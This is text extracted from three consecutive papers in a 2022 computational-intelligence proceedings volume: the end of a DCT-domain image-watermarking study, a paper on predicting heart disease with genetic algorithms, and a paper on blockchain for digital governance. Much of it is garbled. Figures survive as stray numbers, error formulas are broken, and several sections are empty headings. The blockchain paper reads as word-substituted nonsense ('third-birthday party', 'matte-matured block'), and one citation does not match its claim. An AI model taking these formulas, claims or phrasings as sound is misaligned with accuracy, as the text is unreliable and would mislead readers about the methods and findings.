to 5 × 5. Upon analysis under varied strengths of the attack, it is evident that the
Table 2 NC values and BER values of the proposed method
Attack Lena Cameraman Pepper Girl Barbara
BER NC BER NC BER NC BER NC BER NC
No attack 0 1 0 1 0 1 0 1 0 1
Median filter 0 1 0 1 0 1 0 1 0 1
Average filter 0.039 0.96 0.017 0.9957 0.0043 0.9957 0.039 0.9606 0.0065 0.9935
Resize 0 1 0 1 0 1 0 1 0 1
JPEG Compression 0 1 0 1 0 1 0 1 0 1
Rotation 0 1 0 1 0 1 0 1 0 1
Histogram equalization 0 1 0 1 0 1 0 1 0 1
Weiner filter 0 1 0 1 0 1 0 1 0 1
Gaussian filter 0 1 0 1 0 1 0 1 0 1
Translation 0.019 0.98 0.0025 0.9975 0.019 0.9808 0.011 0.989 0.003 0.997
Cropping 0.019 0.98 0.0031 0.9969 0.011 0.9989 0.008 0.992 0.002 0.998
Secured Blind Image Watermarking Using Entropy Technique in DCT Domain
41
42 M. Gupta and R. Rama Kishore
1
0.98
0.96
0.94
-3 -2 -1 0 1 2
Lena Cameraman
Pepper Girl
Barbara
Lena Cameraman
Pepper Girl
Barbara
Lena Camerama
Pepper Girl
Barbara
Secured Blind Image Watermarking Using Entropy Technique in DCT Domain 43
0.85
20 40 50 60 80
Lena Cameraman
Pepper Girl
Barbara
0.98
0.96
0.94
0.92
1 2 3 4 5
Lena Cameraman
Pepper Girl
Barbara
proposed method achieved great robustness as NC value lies in between 0.9 and 1.
Results are shown in Fig. 9.
Comparison with present methods The proposed method is put up against many
methods for comparing NC values and PSNR values, as shown in Tables 3 and 4.
It is clear to the understanding from Table 3 that current methods achieved lesser
PSNR values than the introduced method, which betokens better imperceptibility of
this method. Table 4 exhibits higher NC values that are obtained by the submitted
method than current methods. Under different attacks, the method can get NC value
close to 1, which is a clear proof of the method’s robustness.
44 M. Gupta and R. Rama Kishore
5 Conclusion
In this paper, the concepts of Shannon’s entropy in the DCT domain and water-
mark encryption are used to embed the watermark in the host image. The proposed
method embeds the watermark in such a way that extraction can be done blindly,
and at the same time, it provides a balance between robustness and imperceptibility.
The entropy-based block selection and encryption of the watermark with discrete
cosine transform give more reliable outcomes than common discrete cosine trans-
form methods in digital watermarking. Additionally, the watermarking technique is
secured for the reason that the process of encryption takes place before embedding
any watermark. The watermark persists under all the varied attacks as NC remains
close to value 1; this betokens that the method maintains high robustness. The image
continues to be imperceptible because the average PSNR value is 42.7362. The
proposed method is also adaptive, as embedding strength depends upon the charac-
teristics of the local block; this makes the method even more imperceptible. Results
are compared with existing methods [35, 47, 48], which authenticate that the proposed
method is relatively better.
References
1. Berghel, H., & O’Gorman, L. (1996). Protecting ownership rights through digital watermarking.
Computer, 29(7), 101–103.
2. Chang, C. C., Hwang, K. F., & Hwang, M. S. (2003). A digital watermarking scheme using
human visual effects. Informatica, 24(4), 505–511.
3. Alshanbari, H. S. (2020). Medical image watermarking for ownership and tamper detection.
Multimedia Tools Application.
4. Fazlali, H. R., Samavi, S., Karimi, N., et al. (2017). Adaptive blind image watermarking using
edge pixel concentration. Multimedia Tools Application, 76, 3105–3120.
5. Isinkaye, F., & Aroge, T. (2005). Watermarking techniques for protecting intellectual properties
in a digital environment. Journal of Computer Science and Technology, 12(27).
6. Giri, K., Quadri, S., & Bashir, R. (2018). DWT based colour image watermarking: A review.
Multimedia Tools Application, 79, 32881–32895.
7. Zebbiche, K., Khelifi, F., & Loukhaoukha, K. (2018). Robust additive watermarking in the
DTCWT domain based on perceptual masking. Multimedia Tools Application, 77, 21281–
21304.
8. Escalante-Ramírez, B., Gomez-Coronel, S. L. (2018). A perceptive approach to digital image
watermarking using a brightness model and the Hermite transform. Mathematical Problems in
Engineering, 2018, 19. Article ID 5463632.
9. Gaaed, M., Almutiri, M. T., Ben, O. (2018). Digital image watermarking based on LSB
techniques: A comparative study. International Journal of Computer Applications.
10. Su, Q., Decheng, L., Zihan, Y., et al. (2019). New rapid and robust colour image watermarking
technique in spatial domain. IEEE Access, 7, 30398–30409.
11. AL-ardhi, S., Thayananthan, V., & Basuhail, A. (2020). A new vector map watermarking
technique in frequency domain based on LCA-transform. Multimedia Tools Application, 79,
32361–32387.
12. Agarwal, N., & Singh, P. (2019). Survey of robust and imperceptible watermarking. Multimedia
Tools and Applications, 78. https://doi.org/10.1007/s11042-018-7128-5.
46 M. Gupta and R. Rama Kishore
13. Cox, I., Kilian. J., Leighton, F., & Shamoon, T. (1996). Secure spread spectrum watermarking
for multimedia. IEEE Transactions on Image Processing.
14. Khan, A. (2020). 2DOTS-multi-bit-encoding for robust and imperceptible image watermarking.
Multimedia Tools Application.
15. Singh, R., Shaw, D., Jha, S., & Kumar, M. (2017). A DWT-SVD based multiple watermarking
schemes for image-based data security. Journal of Information and Optimization Sciences, 39,
1–16. https://doi.org/10.1080/02522667.2017.1372153.
16. Feng, B., Yu, B., Bei, Y., & Duan, X. (2019). A reversible watermark with a new overflow
solution. IEEE Access, 7, 28031–28043.
17. Shih, F., & Zhong, X. (2016). Intelligent watermarking for high-capacity low-distortion data
embedding. International Journal of Pattern Recognition and Artificial Intelligence.
18. Savakar, D. G., & Ghuli, A. (2019). Robust invisible digital image watermarking using hybrid
scheme. Arabian Journal for Science and Engineering, 44, 3995–4008.
19. Garg, P., & Kishore, R. (2019). Performance comparison of various watermarking techniques.
Multimedia Tools and Applications, 79(35–36), 25921–25967.
20. Loan, N. A., Hurrah, N. N., Parah, S. A., Lee, J. W., Sheikh, J. A., & Bhat, G. M. (2018). Secure
and robust digital image watermarking using coefficient differencing and chaotic encryption.
IEEE Access, 6, 19876–19897.
21. Sanyal, N., Chatterjee, A., & Munshi, S. (2006). An adaptive bacterial foraging algorithm for
fuzzy entropy-based image segmentation. Expert Systems with Applications, 38(12), 15489–
15498.
22. Sharma, P. (2012). Analysis of image watermarking using least significant bit algorithm.
International Journal of Information Sciences and Techniques.
23. Boussif, M., Aloui, N., & Cherif, A. (2020). DICOM imaging watermarking for hiding medical
reports. Medical & Biological Engineering & Computing, 58, 2905–2918.
24. Byun, S., Son, H., & Lee, S. (2019). Fast and robust watermarking method based on DCT
specific location. IEEE Access, 7, 100706–100718.
25. Malik, S., & Reddlapalli, R. (2018). Histogram and entropy based digital image watermarking
scheme. International Journal of Information Technology.
26. Thanki, R., & Borra, S. (2019). Fragile watermarking for copyright authentication and tamper
detection of medical images using compressive sensing (CS) based encryption and contourlet
domain processing. Multimedia Tools Application, 78, 13905–13924.
27. Yang, C., Zhu, C., Wang, Y., et al. (2020). A robust watermarking algorithm for vector
geographic data based on QIM and matching detection. Multimedia Tools Application, 79,
30709–30733.
28. Mehta, R., Gupta, K., & Yadav, A. K. (2020). An adaptive framework to image watermarking
based on the twin support vector regression and genetic algorithm in lifting wavelet transform
domain. Multimedia Tools Application, 79, 18657–18678.
29. Deljavan, A., Meghdadi, M., & Amiri, A. (2018). HVS-based scalable image watermarking.
Multimedia Tools and Applications.
30. Celik, M., Sharma, U., Saber, G., & Tekalp, A. (2002). Hierarchical watermarking for secure
image authentication with localization. IEEE Transactions on Image Processing, 11(6), 585–
595.
31. Kumar, R., Das, R., Mishra, V., & Dwivedi, R. (2011). Fuzzy entropy-based neuro-wavelet
identifier-cum-quantifier for discrimination of gases/odours. IEEE Sensors Journal, 11(7),
1548–1555.
32. Alzubi, O. A., Nazir, J. A. A. S., & Hamdoun, H. (2015). Cyber attack challenges and resilience
for smart grids. European Journal of Scientific Research.
33. Yuan, Z., Liu, D., & Zhang, X., & Su, Q. (2019). New image blind watermarking method based
on two-dimensional discrete cosine transform. Optik, 164152.
34. Zhang, L., Yan, H., Zhu, R., et al. (2020). Combinational spatial and frequency domains
watermarking for 2D vector maps. Multimedia Tools Application, 79, 31375–31387.
35. Garg, P., & Kishore, R. (2020). Secured and multi optimized image watermarking using SVD
and entropy and prearranged embedding locations in transform domain. Journal of Discrete
Mathematical Sciences and Cryptography, 23(1), 73–82.
Secured Blind Image Watermarking Using Entropy Technique in DCT Domain 47
36. Mohammed, A., Salih, D., Saeed, A., et al. (2020). An imperceptible semi-blind image water-
marking scheme in DWT-SVD domain using a zigzag embedding technique. Multimedia Tools
Application, 79, 32095–32118.
37. Kamble, S., Maheshkar, V., Agarawal, S. V. (2010). Robust multiple watermarking using
entropy based spread spectrum. Communications in Computer and Information Science (CCIS),
94, 497–507.
38. Gul, E., & Ozturk, S. (2020). A novel triple recovery information embedding approach for
self-embedded digital image watermarking. Multimedia Tools Application, 79, 31239–31264.
39. Mehta, R., Rajpal, N., & Vishwakarma, V. (2016). Adaptive Image Watermarking Scheme
Using Fuzzy Entropy and GA-ELM hybridization in DCT domain for copyright protection.
Journal of Signal Processing Systems, 84, 265–328.
40. Mokhtari, Z., & Melkemi, K. (2011). A new watermarking algorithm based on entropy concept.
Acta Applicandae Mathematicae, 116, 65–69.
41. Alzubi, J. A., Manikandan, R., Alzubi, O. A., Qiqieh, I., Rahim, R., Gupta, D., & Khanna,
A. (2020). Hashed Needham Schroeder Industrial IoT based cost optimized deep secured data
transmission in cloud. Measurement.
42. Alzubi, J. A., Manikandan, R., Alzubi, O. A., Gayathri, N., & Patan. R. (2019). A survey of
specific IoT applications. International Journal on Emerging Technologies.
43. Pevný, T., Filler, T., & Bas, P. (2010). Using high-dimensional image models to perform highly
undetectable steganography. In Proceedings of International Workshop on Information Hiding,
Calgary Canada (pp. 161–177).
44. Liu, X., et al. (2019). A novel robust reversible watermarking scheme for protecting authenticity
and integrity of medical images. IEEE Access, 7, 76580–76598.
45. Dappuri, B., Rao, M. P., & Sikha, M. B. (2020). Non-blind RGB watermarking approach using
SVD in translation invariant wavelet space with enhanced Grey-wolf optimizer. Multimedia
Tools Application, 79, 31103–31124.
46. Tyagi, S., Singh, H., & Agarwal, R. (2017). Image watermarking using genetic algorithm in
DCT domain. In International Conference on Inventive Systems and Control (ICISC).
47. Prabha, K., & Sam, S. (2020). A novel blind color image watermarking based on Walsh
Hadamard transform. Multimedia Tools Application, 79, 6845–6869.
48. Yuan, Z., Liu, D., Zhang, X., et al. (2020). DCT-based color digital image blind watermarking
method with variable steps. Multimedia Tools Application, 79, 30557–30581.
Prediction of Heart Disease Using
Genetic Algorithm
1 Introduction
Machine learning (ML) is a science that enables a computer to learn on its own
from the training process, without explicitly programming the computer. ML algo-
rithms can analyze historical data sets from different sources. Machine learning
techniques involve two types of data sets, a training data set needed to train the
model or algorithm, and a test data set used for predicting and classification of the
model.
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 49
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_4
50 N. M. Lutimath et al.
Across the world, one of the major cause for death among humans is heart attack.
People with heart disorders suffer from a severe illness, physical disability, and
decreased quality of life. By identifying proper risk factors, the heart’s diseases
can be easily detected early and controlled. Also, timely detection, diagnosis, and
treatment will reduce the cases of death related to heart diseases. Early identification
of heart disease is a critical issue. Traditional methods are ineffective in identifying
the presence of such diseases. So, current techniques like AI and machine learning
are more accurate and reliable and effective in detecting and diagnosing people with
heart ailments, leading to a reduction in mortality rate.
Using genetic algorithms, the proposed work is used to auto-tune classification
methods like random forest, XGBoost, and neural networks. Usage of genetic algo-
rithms improves the classification algorithm’s performance by identifying the most
prominent features in the heart disease data set. Genetic algorithms determine the
weights associated with the feature in the neural networks with less number of iter-
ations. The Z-Alizadeh Sani data set with details of 303 patients with examination
on ECG, echo, demographic, and Laboratory is used. The genetic algorithm model’s
computational results show that the overall performance can be further improved by
further use of ensemble process giving equal importance to all three models. Better
prediction accuracy of the disease was observed using classification procedures such
as Ada Boost, bagged trees, random forest, and majority voted output [1].
Heart is an important organ which pumps blood to various organs of the body.
Other vital organs like kidney and brain need sufficient supply of oxygen for their
functioning. Medical professional like cardiologists, thoracic, vascular, and inter-
ventional radiologists treats cardiovascular diseases. WHO has estimated around 12
million deaths due to heart disorder every year worldwide [2].
The paper is organized as follows with 4 sections; Sect. 2 describes the existing
literature and related work; Sect. 3 describes classification procedure; Sect. 4
describes classification methods used. Section 5 describes the characteristic feature
engineering of the attributes in the data set. Section 6 deals with prediction and
performance analysis, and Sect. 7 deals with the conclusion.
2 Related Work
Classification is a key learning concept for machine learning. It has three basic forms,
namely supervised, unsupervised, and semi-supervised classification. The predic-
tion model can be created using any of the three learning procedures using suitable
training data set. A heart disease diagnosis framework with machine intelligence was
presented for analysis [3]. The proposed framework used to predict the records of
heart patients, and the features of factor mixed analysis of data (FAMD) was utilized
to extract the derived attributes from the UCI heart disorder data set. Holdout vali-
dation approach was used for validation. Association rule approach for classifying
efficient data sets and appropriate rules was generated for the heart disorder [4].
Prioritization of rules was done. And also rules were categorized into original rules
Prediction of Heart Disease Using Genetic Algorithm 51
and pruned rules. The proposed system was efficient in decision making based on the
specified parameters. During the training of the model, tenfold validation method was
used. Accuracies of 86.3 and 87.3% were achieved in the training phase and testing
phase, respectively. Neural network for prediction is studied by many researchers.
Quality of prediction can be improved using neural network model. This approach
was a neural network augmented by another machine learning procedure called a
hybrid approach was proposed diagnosis for heart disorder [5]. Initial weights of
the neural networks can be enhanced using genetic algorithms, and the performance
of neural network was subsequently increased by 10%. During performance anal-
ysis, sensitivity and specificity rates of 93, 97, and 92% were achieved, respectively.
Data set from Z-Alizadeh Sani was used for analysis. Computer-aided techniques
are essential for the automated prediction of heart disorder suffering person. An
automated classification procedure between normal and heart disease patients using
ECG with the application of higher order statistics and spectra was proposed [6].
Automated heart disorder identification using nonlinear HOS attribute extraction
approach and ECG signals was done. A capable result was achieved when normal
and heart disorder affected ECG signals were used. Using 31 cumulate features, an
accuracy of 98.99% was achieved. In recent times, deep learning has become one
of the important areas of machine learning. It is concerned with multilayer neural
networks and motivated by the functioning and structure of the human brain. To
enhance deep learning method, a deep belief network with optimal configuration
for prediction of heart disease on Ruzzo–Tompa and stacked genetic algorithm was
proposed in [7]. Some of the important attributes were used for prediction of the
heart disorder along with three different types classification methods. XGBoost,
random forest, and neural networks were used with genetic algorithms [8]. The most
important attributes were used for maximizing classification using Z-Alizadeh Sani
data set with demographic examination, having 303 patients. The performance accu-
racy of the prediction model can be improved by choosing the correct sequence of
characteristics features. The research should aim to improve the prediction accu-
racy of the presence of cardiovascular disease by identifying significant features
data mining techniques [9]. Prediction models were developed by combining of
characteristic feature engineering from data sets and by utilizing classification tech-
niques like decision tree, Naive Bayes theorem, K-nearest neighbor, artificial neural
networks, logistic regression (LR) model, and support vector machine (SVM) to
name a few. The outcomes of the vote approach model on that the heart disease with
vital specified features predict with accuracy of 87.4% [10]. Multivariate analysis
is one of the vital methods in attribute selection. Logistic regression is utilized in
machine learning classification approach by using artificial neural networks. Along
with these classification techniques, evolutionary algorithms have evolved as one
of important procedures for predicting test models [11]. In recent years, investi-
gation and research toward classification techniques have drawn attention among
researchers. Improving the accuracy of the classification ensemble has become an
ultimate goal. Deep Learning is also a vital technique for classification [12]. An inno-
vative meta heuristic method with feature extraction and prediction was introduced
52 N. M. Lutimath et al.
3 Classification
4 Classification Methods
In the proposed work, we consider the important methods for classification namely
artificial neural network with genetic algorithm.
The artificial neural network is a perceptron neural network that can consist of
multiple layers. The single layer perceptron with no hidden layers can solve only
Prediction of Heart Disease Using Genetic Algorithm 53
solve problems which are linearly separable. But many of the recent trend real-time
problems are linearly separable and also complex. To solve such problems, multi-
layer neural networks with one or more hidden layers are to be added between the
input and output layer with error functions. These multilayer perceptron networks
are also known as feed-forward neural network. These multilayer neural networks
are used for medical image and data diagnostics, pattern recognition, classification
of input patterns, and autonomous vehicle.
5 Feature Engineering
Data set repository for heart disorder from UCI is used for the process of classifi-
cation. Training and test data sets are obtained by segregating the data set. During
feature engineering, we consider suitable attributes for training the model. The trained
classification model is then used to predict the class of the examples in the test data.
54 N. M. Lutimath et al.
The feature attributes contributing to the prediction of heart disease are defined
as data fields as shown below.
The data set has the following attributes as data fields,
c_age—This characteristic feature of the attribute indicates the age in terms of
number of years.
c_sex—The characteristics of this feature indicate the sex of the patient, specified
in male and female with a value of 1 and 0, respectively.
c_cp—The characteristics of this feature indicate the chest pain category for
typical angina, a typical angina, and asymptomatic category with values 1, 2, and
3, respectively.
c_trestbps—The value of BP at rest when the patient is admitted. It is measured
in mm/Hg.
c_chol—The feature is used for serum cholesterol measured in mg/dl.
c_fbs—It represents the level of fasting blood sugar. It is true or 1 when the
measured fasting blood sugar is more than 120 mg/dl otherwise considered to be
false or 0.
c_restecg—Specified as 0 for normal and 1 for wave abnormality in ST-T with
inversion in T wave and/or evaluation or depression in ST with >0.05 mV. Definite
observation of left ventricular hypertrophy by Estes’ criteria is represented by a
value of 2.
c_thalach—This attribute is specified for person suffering from maximum heart
rate.
c_exang—The characteristic feature of this attribute with values of 1 and 0 where
1 for exercise induced angina with categorical values of yes and no.
c_oldpeak—The characteristic feature of this attribute is for ST depression made
by exercise relative to rest.
c_slope—Which represents ST segment peak exercise slop indicated by values
of 1, 2, and 3 up, flat and down sloping is, respectively.
c_ca—The count of major vessels from 0 to 3 for fluoroscopy coloring.
c_num—This attribute represents the prediction of the persons with heart disorder.
Out of 303 tuples in the UCI data set repository of the Cleveland data set on the
heart disease, 212 examples are used during the training phase and other are used as
records in test data. The data set for training and test data is created using Python
code as shown in Eq. (1),
The genetic algorithm formula to train the model calculated using Eqs. 2 and 3 in
Python is given below, In Eq. 2, log model is constructed, and in Eq. 3, the genetic
model is developed.
Prediction of Heart Disease Using Genetic Algorithm 55
logmodel.fit X− train.iloc [: chromo [−1]], yt rain (2)
The three performance measures used in this work are mean absolute error (MAE),
which is obtained by calculating the difference of the mean between absolute actual
and predicted values, mean squared error (MSE) and root mean squared error (RMSE)
for predictive analysis.
MAE is given by,
In Eq. 4, MAE is the mean absolute error, yi is the ith actual data set, and oi is the
ith predicted data set value.
RMSE is defined as the square root of the average of squared errors. It is given
by,
n
RMSE = 1/n ( f i − oi ) (5)
i=1
1
n
MSE = (yi − oi ) (6)
n i=1
In Eq. 6, MSE is the mean squared error, yi is the ith value of a instance in the
data set, oi is the ith predicted instance value of data set, and n indicates the number
of test samples.
56 N. M. Lutimath et al.
6 Prediction Analysis
In this study of prediction analysis, preprocessing of data set is done first. After
preprocessing, we evaluate the mean of the attribute values for representing the
missing data. The performance measures used during the prediction process are
namely MAE, RMSE, and MSE. These measures are calculated using the training
and test models on the heart disease data set. Observing Table 1, the value of MAE
is lesser than MSE and RMSE. In Table 2, we find the MAE and MSE are minimum
when c_sex is female with values of 0.44 and 1.06, respectively. Thus, when c_sex
attribute represents female, the model performs better prediction.
Now looking at Table 3, we observe that when c_cp equals 1 MAE and MSE
have a lower value of 0.29 and 0.29, respectively. Thus, c_cp attribute contributes for
improved prediction accuracy of the model. Deviation from actual values is observed
in the prediction model when MAE and MAE have highest values of 0.95 and 2,
respectively. Now analyzing the contents of Table 4, we observe that MAE and MSE
Table 3 Values of MAE, SSE, and MSE for male and female categories for attribute c_cp
Type_o f_error Value_of c_cp = Value_of c_cp = Value_of c_cp = Value_of c_cp =
1 2 3 4
MAE 0.29 0.33 0.36 0.95
MSE 0.29 0.73 0.92 2
RMSE 0.53 0.86 0.96 1.41
have minimum values of 0.50 and 0.50, respectively, when c_slope attribute is 3. In
this case, the prediction model provides better accuracy. When c_slope has a value
of 2, MAE and MSE have highest value of 0.76 1.71, respectively, as shown in Table
4. This makes the prediction model to deviate from the actual values. MAE has a
low value of 0.29 under the consideration of the attributes c_sex, c_cp and c_slope.
This occurs when c_cp has a value of 1. Thus, the attribute c_cp provides better
prediction. We also obtain a minimum value for RMSE of 0.53 when the attribute
c_cp has a value of 1.
7 Conclusion
In this paper, genetic algorithm is utilized in predicting heart disease among patients.
We have used the data set on heart disease available at the UCI machine learning
repository. Performance measures namely MSE and RMSE are calculated using
feature engineering technique on the attributes of the heart disease data set. The male
and female attribute in the data set is also analyzed. RMSE consistency measures indi-
cate that females are succumbed than males by the heart disease. In future, the accu-
racy of the prediction can be improved by utilizing other machine learning methods
such as deep neural networks and association rule mining with other performance
measures.
References
1. Yekkala, I., & Dixit, S. (2018). Prediction of heart disease using random forest and rough set
based feature selection. International Journal of Big Data and Analytics in Healthcare, 3(1),
1–12.
2. Bhuvaneswari Amma, N. G. (2012). Cardiovascular disease prediction system using genetic
algorithm and neural network. In International Conference on Computing, Communication
and Applications, Dindigul, Tamilnadu, India (pp. 1–5). IEEE.
3. Gupta, A., et al. (2020). A machine intelligence framework for heart disease diagnosis. IEEE
Access, 8, 14659–14674.
4. Purushottam, K. S., & Sharma, R. (2016). Efficient heart disease prediction system. Procedia
Computer Science, 85, 962–969.
5. Arabasadi, Z., Alizadehsani, R., Roshanzamir, M., Moosaei, H., & Yarifard, A. A. (2017).
Computer aided decision making for heart disease detection using hybrid neural network-
Genetic algorithm. International Journal of Computer Methods and Programs in Biomedicine,
141, 19–26.
6. Acharyaa, U. R., Sudarshana, V. K., Koha, J. E. W., Martis, R. J., Tana, J. H., Oha, S. L.,
Muhammada, A., Hagiwaraa, Y., Mookiaha, M. R. K., Chuaa, K. P., Chuaa, C. K., & Tane,
R. S. (2017). Application of higher-order spectra for the characterization of Coronary artery
disease using electrocardiogram signals. Biomedical Signal Processing and Control, 31, 31–43.
7. Ali, S. A., Raza, B., Kamran, A., Malik, Shahid, A. R., Faheem, M., Alquhayz, H., & Kumar, Y.
J. (2020). An optimally configured and improved deep belief network (OCI-DBN) approach for
heart disease prediction based on Ruzzo–Tompa and stacked genetic algorithm. IEEE Access,
8, 65947–65958.
58 N. M. Lutimath et al.
8. Yekkala, I., & Dixit, S. (2020). A novel approach for heart disease prediction using genetic
algorithm and ensemble classification. In Proceedings of SAI Intelligent Systems Conference,
Intelligent Systems and Applications (pp. 468–489). Springer.
9. Amin, M. S., Chiam, Y. K., & Varathan, K. D. (2019). Identification of significant features and
data mining techniques in predicting heart disease. Telematics and Informatics, 36, 82–93.
10. Wiharto, H. K., & Herianto, H. (2017). Hybrid system of tiered multivariate analysis and arti-
ficial neural network for coronary heart disease diagnosis. International Journal of Electrical
and Computer Engineering (IJECE), 7(2), 1023–1031. ISSN 2088-8708. https://doi.org/10.
11591/ijece.v7i2.pp1023-1031.
11. Alzubi, O. A., Alzubi, J. A., Alweshah, M., Qiqieh, I., Al-Shami, S., & Ramachandran,
M. (2020). An optimal pruning algorithm of classifier ensembles: Dynamic programming
approach. Neural Computing and Applications. https://doi.org/10.1007/s00521-020-04761-6.
12. Alzubi, O. (2020). Deep learning-based intrusion detection model for industrial wireless sensor
networks. Journal of Intelligent & Fuzzy Systems, In press.
13. Gupta, D.,Rodrigues, J. J. P. C., Sundaram, S., Khanna, A., Korotaev, V., & Albuquerque,
V. H. C. (2018). Usability feature extraction using modified crow search algorithm: A novel
approach. Neural Computing and Applications. https://doi.org/10.1007/s00521-018-3688-6.
Secured Information Infrastructure
for Exchanging Information for Digital
Governance
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 59
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_5
60 M. S. Alias and S. B. Goyal
1 Introduction
Blockchains, which had been proposed in 2008 by using Satoshi Nakamoto for the
monetary sector [1], are considered to be one of the extensive, disruptive fourth indus-
trial revolution technologies [2]. Blockchain is described as a report of transactions
for cryptography that is related in a peer-to-peer community across several computers.
Blockchain uses an unsymmetrical cryptography mechanism to confirm the substan-
tiations of transactions [3]. In general, blockchain authorizes to replace transactions
effectively between two or more parties in a virtual decentralized ledger without the
want for intermediaries [4]. A blockchain is an allotted ledger that accomplishes the
subsequent:
i. Records any transaction or records steadily, completely, and unmodified.
ii. Makes use of one-manner hash cryptography this is computationally imprac-
tical to break.
iii. Able to be seen to all customers with permission.
iv. Makes use of peer-to-peer transmission with each node forwarding new
transactional facts to all others.
v. Can trigger transactions routinely, primarily based on commercial enterprise
common sense and custom algorithms
vi. Verifies transactions via node consensus and not using a reliance on third-
birthday party intermediaries.
public as a “compromise method,” which allows p2p network clients to verify trans-
actions and renew subscriptions across networks [6]. The consensus machine is used
to set the trust within the precision of facts on a device that is historically installed
by the average person or administrator on the medium. A consensus approach is a
process in which nodes in a shared community agree on proposed activities. This
implementation comes with a way of keeping records within a ledger in a way that
ensures complete price records and consistency. Permit methods are still distributed
through network governance regulations and agreements that allow for documenta-
tion, finalization, and execution of transactions subject to certain conditions. There-
fore, a pretransaction can be agreed upon creating a chain of transactions similar to
a ledger. In blockchains, most transactions are integrated into a matte-matured block
in the previous block. Within the context of bitcoin, after a difficult and fast time, a
new block was created and researcher came up with a blockchain transaction and it
was tested throughout the community. These documents are a series of blocks also
known as blockchain.
Another key factor supported by using more than one blockchains is smart contracts.
Intelligent contracts are parts of software that perform different functions depending
on the state of the machine or what is happening. Glossary agreement is a laptop appli-
cation or protocol that assists, validates, or implements the terms of the agreement
[7]. Smart contracts apply to used ledger. They do not choose human intervention and
do so. With built-in assumptions, smart contracts typically produce financial games
and repeat good events and cryptocurrency intervenes financial transactions without
unintentional and unintentional errors [8]. Smart contracts can be seen as non-public
regulatory bodies that refer to a set of rules that govern transactions between inter-
ested parties. Once set, smart contracts do not change and are binding, causing, but
not resolved, the problem of dealing with damage caused by malfunction or code
errors. The smart contract is in official objective sentences. In an integrated system,
the right motive can be judged through a mediator in the event of a dispute. However,
in an invalid blockchain gadget, there is no separate arbitrator, and personal purpose
cannot be detected by entering computer codes. While it may not completely solve
the problem of seeking a superior arbitrator, the personal blockchain gadget can grant
rights to test programs and will no doubt be accurate or refuse certain transactions.
various locations to enhance and validate transactions and capture data in a consistent
manner across the community. Any player with the right to access the rights may
receive any real time, at any time in its history, from any actor in the community with
season plans to transact in a simple-key way of codes. Currency exchange arrange-
ments are quickly developed between related peers and consistently demonstrate the
use of algorithms over the community.
2 Literature Survey
The era of visible governance, formerly known as e-governance, refers to the use
of ICT to sell modern, green, and powerful governance and to facilitate access to
governance statistics and offerings. It contains the implementation of ICT in the
management of the public sector which may lead to the implementation of public
services and methods. E-governance is a broad term that encompasses the preparation
of national institutions, electoral strategies, and the relationship between governance
and the general public. Digital management has organizational, administrative, and
technical aspects in eight broad categories that may be:
i. Governance-to-citizen: Provides well-known online social services, espe-
cially electronic network transmissions related to change and word exchange.
ii. Citizen-to-governance: Offers general public online donations, especially
electronic delivery of providers in exchange for other transactions and
communications.
iii. Governance-to-business: Helps to drive e-transaction projects, such as e-
purchases.
Secured Information Infrastructure for Exchanging Information … 63
3 Problem Statement
This paper aims to clarify how blockchain production research is done in digital
control according to Okoli and Schabram’s manual [10] by conducting systematic
64 M. S. Alias and S. B. Goyal
tests. The manual contains specific activities, as well as the development of an evalu-
ation protocol, which explains subject selection, data extraction, and reporting results
as a guide to answering the following research questions below:
i. How has blockchain generation been researched in the context of virtual
governance?
ii. What are the possibilities, challenges, and consequences diagnosed in the
studies on blockchain technology for virtual governance?
iii. How ought to blockchain generation gain public management inside the context
of reform frameworks?
iv. What are the current public administration reform frameworks?
v. How does blockchain fits well into the narrative of the contemporary public
administration reform framework?
vi. What are the ability use cases of blockchain within the context of public
management?
4 Hypothesis
These security requirements are changing rapidly in the gadget distributed to special-
ized companies, as each organization desires a better way to manage their right to
self-regulatory access [6]. Organizations often retain and take away their right to
enter data management on central servers when using encrypted structures. Gadget
integration controls customer permissions to intervene in internal authentication [5].
The conceptualization studies for this paper are illustrated in terms of research that
can be:
i. The latest blockchain adoption of state-of-the-art technology systems signifi-
cantly improves the efficiency and security of record infrastructure in digital
management.
ii. The blockchain era has a positive impact between the power-enabled access
control machine and the e-governance system.
iii. The duration of smart contracts has a practical effect between the low access
control gadget and the benefits of public administration.
iv. The released ledger time has a positive effect between the intensified entry to
manage the gadget infrastructure and the virtual control device data.
v. Blockchain generation is reorganizing the record regulation officially in
governance frameworks.
5 Methodology
6 Expected Impact
7 Conclusion
Programs designed for blockchain will be able to reduce the cost of connecting
devices and convert unstructured communities from a single feature bottle without
the centralized authority to change data involving domains. By using a smart envi-
ronment, devices seem to make themselves and therefore less intelligent. As a rule,
general work can be automated, reduce operating costs, and allow you to manage
service delivery efficiently through a real-world blockchain. Blockchain will dissemi-
nate data so that negative hacking effects can be minimized. Besides, every movement
in the blockchain is recorded and visible to every user. Under such mass surveillance,
misbehavior is not always available.
References
1. Gartner. (2018). Preparing for smart contract adoption. Retrieved February 7, 2019 from
https://www.gartner.com/doc/3894102/preparing-smart-contractadoption
2. Okoli, C., & Schabram, K. (2011). A guide to conducting a systematic literature review of
information systems research. In Working Papers on Information Systems: Sprouts. ISSN 1535-
6078
3. Aitzhan, N. Z., & Svetinovic, D. (2018). Security and privacy in decentralized energy trading
through multi-signatures, blockchain and anonymous messaging streams. IEEE Transactions
on Dependable and Secure Computing, 15(5), 840–852.
4. Wright, A., & De Filippi, P. (2015). Decentralized blockchain technology and the rise of lex
cryptographia. SSRN.
5. Back, S. A., Corallo, M., Dashjr, L., Friedenbach, M., Maxwell, G., Miller, A., & Timón, J.,
(2014). Enabling blockchain innovations with pegged. Open Science Review.
6. Ao, X., & Minsky, N. H. (2003). Flexible regulation of distributed coalitions. Lecture Notes
Computer Science, 2808, 39–60.
7. Swan, M. (2015). Blockchain: Blueprint for a new economy (1st edn). Safari Tech Books
Online. Beijing: O’Reilly.
8. Antonopoulos, A. M., & Wood, G. (2018). Mastering ethereum: Building smart contracts and
DApps (1st edn). Sebastopol: O’Reilly Media.
9. Hu, V. C., Ferraiolo, D. F. & Kuhn, D. R. (2006). Assessment of access control systems.
Interagency Report 7316, NIST.
10. Warburg, B. (2016). How the blockchain will radically transform the economy [TED talk].
